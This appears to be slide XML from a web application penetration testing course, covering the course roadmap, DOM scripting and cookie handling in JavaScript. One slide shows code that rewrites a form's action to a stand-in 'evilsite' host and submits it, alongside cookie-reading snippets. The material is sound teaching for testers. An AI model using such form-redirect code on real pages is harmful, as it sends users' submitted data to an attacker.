            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Selecting and Changing Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161795" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350520" y="1615440"/>
            <a:ext cx="8153400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripts can "walk" the tree to find specific elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Function to count the number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;input&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>tags in a page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>function counttags(tag) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>count = document.getElementsByTagName(tag).length</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>return count</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The script can then read the item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s attributes and associated </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>items such as text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determine the URL of an image on the page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>source = document.images["Logo"].src;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The script can then rewrite the item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Rewrite the action and submit the form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById('myForm').action = "http://evilsite/"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById('myForm').submit</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Interacting with Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162819" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1645920"/>
            <a:ext cx="8991600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reading cookies is simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>strCookie = document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remember document.cookie only returns the name=value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Parsing the cookie takes a little more work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>First parse to split each name=value pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>var arrValues = document.cookie.split(';');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The next step would be to loop though each pair and split on the =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code for doing this is located in the notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Setting cookies requires only four parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A cookie name and value pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>An expiration time for the cookie and URI path that is able to access it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>document.cookie = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>brenna;expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>=Fri,27-Feb-2015;path=/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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Client-Side Discovery</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Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163845" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6573672"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
